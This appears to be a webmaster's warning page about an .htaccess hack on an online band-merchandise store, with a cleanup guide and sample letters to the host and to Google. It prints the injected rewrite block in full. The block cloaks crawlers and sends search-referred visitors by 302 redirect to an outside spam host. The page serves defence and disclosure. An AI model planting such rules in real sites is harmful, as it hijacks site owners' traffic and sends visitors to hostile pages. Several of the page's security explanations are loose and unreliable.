the problem: Htaccess hack

You notice an EXTREMELY RAPID and marked decline in traffic to your site.
You may be a victim of this evil hack!
The basic idea of this hack is the spam bot acquires your ftp information ^* and logs into your site. Then they replace your .htaccess files with one that sends traffic to them and then round robins back to you. This gives them the appearance that they are getting YOUR website traffic to the search engines and once discovered will cause search engines to drop your site from the various indexes!!!! Worse,nothing changes to you, except less and less vistors!!, your traffic will drop and you may never get notifed, having done nothing at all and your business goes kerplunk!!!

^*Most typlically and suprisingly FTP clients are CLEAR TEXT so they put a listener on port 21 and just grab RIGHT OUT OF THE AIR!! when you FTP in. So change your protocal to SFTP.
Less likely, but just as effective, is that you have a weak password and your account is hacked.
Either way they "hijack" your account.

PASSWORD RECOMMENDED CONVENTIONS

WEAK PASSWORDS	bob,webmaster,mysite,mydog,mybirthdate,lucky39,etc. <-- DO NOT USE, DON'T DO!!!
STRONG PASSWORDS	TjB6pbt3,TjB6pbt3,uBp7RjtM,or longer t1VYxt92Y9KQrO <-- USE combinations of upper and lower case letters and numbers. Strong passwords as you can see are NOT human friendly to you either!

If none of this sounds familiar, it doesn't apply, not technical STOP READING NOW, this does not apply to you, thanks!

ORGINAL TYPICAL .htaccess Dont worry if you dont understand the directives!

DirectoryIndex /mm5/merchant.mvc
Options +FollowSymlinks
RewriteEngine On
# desc: defines rewrite rules for static links RewriteCond %{REQUEST_URI} ^/p/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=PROD&Product_Code=%1&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/pc/(.*)/(.*)/(.*) [NC] RewriteRule (.*) /mm5/merchant.mvc?Screen=PROD&Product_Code=%1&Category_Code=%2&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/c/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=CTGY&Category_Code=%1&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/s/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Links&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/t/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Help&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/u/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Info&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/v/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=PLST&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/w/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=OINF&Store_Code=N [L]
#RewriteCond %{REQUEST_URI} ^/x/(.*) [NC]
#RewriteRule (.*) /mm5/merchant.mvc?Screen=BASK&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/y/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=SFNT&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/z/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=AFCL&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/q/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=ACNT&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/r/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=LOGN&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/k/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=ACNT&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/m/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=AllNames&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/f/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=SizeCharts&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/music/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=RockBandsA&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/modern_punk_clothing/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=RockBandsB&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/unisex_t-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=RockBandsC&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/emo_wear/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Shirts_D&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_tee-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Shirts_E&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/vintage_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Hoodies_F&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/clothes/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Hoodies_G&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/british_underground/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Shirts_Girls_H&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/alternative_pop/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Heavy_Metal_T-Shirts_I&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rock_and_roll_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Concert_Tees_J&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/new_wave/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Concert_Rock_T-Shirts_K&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/post-punk/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Clothing_L&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rockabilly_merchandise/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Vintage_Clothing_M&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/classic_rock_hoodies/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_60s_Clothes_N&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/art_rock_t-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_70s_Clothes_O&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_clothes/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_80s_Clothes_P&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/hard_core_punk_bands/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_90s_Clothes_Q&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/gothic_rock/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Alternative_Punk_Clothes_R&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Goth_T-shirts_S&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/punk_rock_bands/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Rock_Girls_Shirts_T&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/stadium_rock_bands/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Concert_Hoodies_U&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_clothing/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Leather_V&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Rock_Accessories_W&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rock_clothes_collection/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Moovies_Memorabilia_X&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rock_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Long_Sleeve_T-Shirts_Y&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/heavy_metal/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Pins_Buttons_Z&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/slogan_t-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=&Rock_Bands_Longsleeve_Shirts_Store_Code=N [L]

RewriteCond %{REQUEST_URI} ^/n/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=BandsOnTour&Store_Code=N [L]

#added for calc support
RewriteCond %{REQUEST_URI} ^/az/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=SRCH&Search=%1&Offset=0&filter_cat=&srch_name=1&range_low=&range_high=&PowerSearch_Begin_Only=1 [L]

### Begin - Inserted by Miva Merchant
DirectoryIndex /mm5/merchant.mvc?Screen=SFNT
RewriteEngine On
RewriteRule ^mm5/admin.mvc? - [L]

RewriteCond %{REQUEST_FILENAME} !-s RewriteRule ^product/([^/.]+).html$ /mm5/merchant.mvc?Screen=PROD&Product_code=$1 [L]

RewriteCond %{REQUEST_FILENAME} !-s
RewriteRule ^category/([^/.]+).html$ /mm5/merchant.mvc?Screen=CTGY&Category_code=$1 [L]

RewriteCond %{REQUEST_FILENAME} !-s
RewriteRule ^product/([^/]+)/([^/.]+).html$ /mm5/merchant.mvc?Screen=PROD&Category_code=$1&Product_code=$2 [L]

RewriteCond %{REQUEST_FILENAME} !-s
RewriteRule ^([^/.]+).html$ /mm5/merchant.mvc?Screen=$1 [L]

### End - Inserted by Miva Merchant

HACKED .htaccess

Note the author bot: exgocgkctswo!!
HACK STARTS -- This is appended to THE TOP,BOTTOM, or replaces your existing .htaccess file.

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://jesusonlynet.org/cgi-bin/r.cgi?p=15002&i=0ae385fb&j=331&m=73cef294f4f88039b81560468d32931c&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo
HACK ENDS -- Below is the original file .htaccess file.

#-----------------------------------------------------------------------------
# file: .htacess file
# desc: acidmerch
# date: 2009/05/31
# auth: webmaster
# copy: (C) Copyright 2009 acidmerch, All Rights Reserved.
# -----------------------------------------------------------------------------
Options +FollowSymlinks
RewriteEngine On

# our home page
DirectoryIndex /mm5/merchant.mvc
#DirectoryIndex /mm5/merchant.mvc?Screen=SFNT
# redirect no www request to www,ie acidmerch.com <==> www.acidmerch.com
RewriteCond %{HTTP_HOST} !^www.acidmerch.com$
RewriteRule ^(.*) http://www.acidmerch.com/$1 [R=301,L]

# Defines rewrite rules for dynamic to static links
RewriteCond %{REQUEST_URI} ^/p/(.*)/(.*) [NC]

RewriteRule (.*) /mm5/merchant.mvc?Screen=PROD&Product_Code=%1&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/pc/(.*)/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=PROD&Product_Code=%1&Category_Code=%2&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/c/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=CTGY&Category_Code=%1&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/s/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Links&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/t/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Help&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/u/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Info&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/v/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=PLST&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/w/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=OINF&Store_Code=N [L]
#RewriteCond %{REQUEST_URI} ^/x/(.*) [NC]
#RewriteRule (.*) /mm5/merchant.mvc?Screen=BASK&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/y/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=SFNT&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/z/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=AFCL&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/q/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=ACNT&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/r/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=LOGN&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/k/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=ACNT&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/m/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=AllNames&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/f/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=SizeCharts&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/music/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=RockBandsA&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/modern_punk_clothing/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=RockBandsB&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/unisex_t-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=RockBandsC&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/emo_wear/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Shirts_D&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_tee-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Shirts_E&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/vintage_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Hoodies_F&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/clothes/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Hoodies_G&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/british_underground/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Shirts_Girls_H&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/alternative_pop/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Heavy_Metal_T-Shirts_I&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rock_and_roll_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Concert_Tees_J&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/new_wave/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Concert_Rock_T-Shirts_K&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/post-punk/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Clothing_L&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rockabilly_merchandise/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Vintage_Clothing_M&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/classic_rock_hoodies/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_60s_Clothes_N&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/art_rock_t-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_70s_Clothes_O&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_clothes/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_80s_Clothes_P&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/hard_core_punk_bands/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_90s_Clothes_Q&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/gothic_rock/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Alternative_Punk_Clothes_R&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Goth_T-shirts_S&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/punk_rock_bands/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Rock_Girls_Shirts_T&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/stadium_rock_bands/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Concert_Hoodies_U&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_clothing/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Leather_V&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Rock_Accessories_W&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rock_clothes_collection/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Moovies_Memorabilia_X&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rock_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Long_Sleeve_T-Shirts_Y&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/heavy_metal/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Pins_Buttons_Z&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/slogan_t-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=&Rock_Bands_Longsleeve_Shirts_Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/n/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=BandsOnTour&Store_Code=N [L]

#added for calc support
RewriteCond %{REQUEST_URI} ^/az/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=SRCH&Search=%1&Offset=0&filter_cat=&srch_name=1&range_low=&range_high=&PowerSearch_Begin_Only=1 [L]

#banned users, bots, bad guys

order allow,deny
deny from 65.182.208.101
deny from 58.147.114.99
allow from all

# Keep prying eyes out! 10/22/09 per a-man!
RewriteCond %{http_user_agent} !(googlebot|Msnbot|Slurp) [NC]
RewriteRule ^robots\.txt$ http://www.acidmerch.com/ [R,NE,L]
AddHandler application/x-httpd-php .txt

#RewriteRule ^ANBER0002BL(.*)\.html http://www.acidmerch.com/p/ANBER0002BL/Anberlin+Tshirts++Eyes+Tee.html
# 404 Errors, Missing pages redirection
ErrorDocument 404 /errors/404.php

SOLUTION -- STEPS

RIGHT NOW,FIRST -- Change your FTP PASSWORD and use SFTP instead of FTP FOREVER AND FOR ALL SITES
Download in ASCII mode your current .htaccess in SFTP MODE!!!! MAKE SURE YOU INSPECT THEM ALL -- BE ON LOOKOUT FOR 302 this is a temporary redirect to their site for traffic.
On the host side make a "backup" of your .htaccess to .htaccess- OR .htaccessHACKED DO NOT SKIP THIS STEP!!
-- JUST IN CASE!!! BETTER SAFE THAN SORRY, I do each and everytime DO NOT SKIP!
Replace the file with last good backup or if its not current
-- Edit out the hack,save and upload, Check your site and some sample links to insure all is working!
There will be a delay before it takes, as your host refreshes apache, if godaddy its about every 10 mins or so.
Submit letter to google that you have identified and corrected your problem and request reconsideration.

SPECIAL NOTE:

Once you break the current hacked .htaccess file, if your replacement doesnt work, esp. in the case of MIVA you may break your sites. So be careful!!!
Worse case rename your hacked file to get it up and running, until you can debug the replacement.

Sites to report, Originators of this hack

http://www.lucky-hosting.com/
http://jesusonlynet.org

RELATED RESEARCH

A few good general articles on this kind of spammer

How To Stop Spammers, Comment Spam,etc
Htaccess hack # exgocgkctswo
Requesting GOOGLE reconsideration of your site
FAQ: Crawling, indexing & ranking
.htaccess files
.Tips on requesting reconsideration

SAMPLE HOSTING EMAIL

Dear Hosting

We have noticed a EXTREMELY RAPID and marked decline in traffic to our sites hosted at XXXXXXXXX. We have been reviewing all components parts and found that the .htaccess files {LIST LOCATIONS HERE Typically at least one at / or root_doc which are NOT our content (I am the SOLE ftp access). Googling the authors name within and at the top of the file, exgocgkctswo revealed a url which was short and informative the first few responses:

http://forum.joomla.org/viewtopic.php?p=2260562

which has an IDENTICAL hacked .htaccess file!!!
Which its sole purpose is to REDIRECT TRAFFIC TO THE SPAMMERS SITE!!!
and who targets weak FTP passwords.

We are sending you because not 1 but 2 of our sites hosted by you were attacked.
This to alert you for all your hosting users of this potential and serious danger
and to request to change the ftp access to:

USERNAME: sampleftpuser
PASSWORD: sa0xGs1LJip5LVddSNNlj8mLD3FwM1EGzvR

As soon as you change it I will restore the .htaccess file

Thank You for your Critical and Urgent attention
{YOUR NAME}
Webmaster

SAMPLE GOOGLE RECONSIDERATION EMAIL

Dear Google,

Hello I am Rob XXXXX,webmaster for
We have noticed a EXTREMELY RAPID and marked decline in traffic to our site. We have been reviewing all components parts and found that the main .htaccess files {LIST LOCATIONS HERE Typically at least one at /,/html, htdocs/,DOCROOT which contain content of unknown origin. There is limited access and I am the SOLE ftp access). Googling the bot authors name within and at the top of the file, exgocgkctswo revealed a url which was short and informative the first few responses:

http://forum.joomla.org/viewtopic.php?p=2260562

which has an IDENTICAL hacked .htaccess file!!!

Which as one of its purposes is to REDIRECT TRAFFIC TO THE SPAMMERS SITE!!!
and who targets weak FTP passwords.
It also creates false traffic to their sites and potential harm to visitors and significantly lowered our traffic.

REMEDIAL STEPS

We IMMEDIATELY confirmed and changed all access from FTP to SFTP.
We changed all passwords.^* .htaccess
-- Identified the sites involved
-- We removed all hacked content including the 302 redirect
Alerted hosting.
Posted public service announcements (PSA) of the hosting accounts and several locations:
--http://splido.com/hackTrak/
Reviewed and implemented tips from Google's .Tips on requesting reconsideration
After all the work and research, we changed all passwords one last time.

^* The FTP passwords were changed and are very strong and secure and provide 48 Bit encryption. They would require possibly several millions of guess attempts inorder for someone to guess your FTP password. The security on our servers only allows a maximum of 144 FTP password attempts in a 24 hour period.

We feel we have done everything possible and are secure and ready to resume business and ask you to reconsider our site and ask for any help you can offer as to alerting the proper authorities regarding this type of activity.
Thank You for yourattention
{YOUR NAME}
Webmaster

UPDATES

We have discovered that the hack is not just the root and secondary directories but can be extensive. As much as ALL the directories. One site had HUNDREDS of affected files!!!
Obvious this is difficult to locate as well as identify. So I wrote a program to scan for it
which is avialable to you as well. Just put it somewhere on your server and run it. I made it a
single file utility for ease of use.

scan.php --Run it on THIS server
scan.php -- View source
README.txt

Sniff is extracted url from the .htaccess that i started investigating - in progress:
sniff.php --Run it on THIS server
sniff.php -- View source

We also have learned that the main one is a group out of Germany!

We put this here as a public service and did not intend to make money with it.
If you are being attacked and can't do it yourself and need technical assistance doing this we can do it for you for a small charge.
Member of Software Contractors' Guild

and Guru Freelancer

Just email us at webmaster@

We welcome your comments,or just drop us a line webmaster@

Cheers :)

302 REDIRECT Hack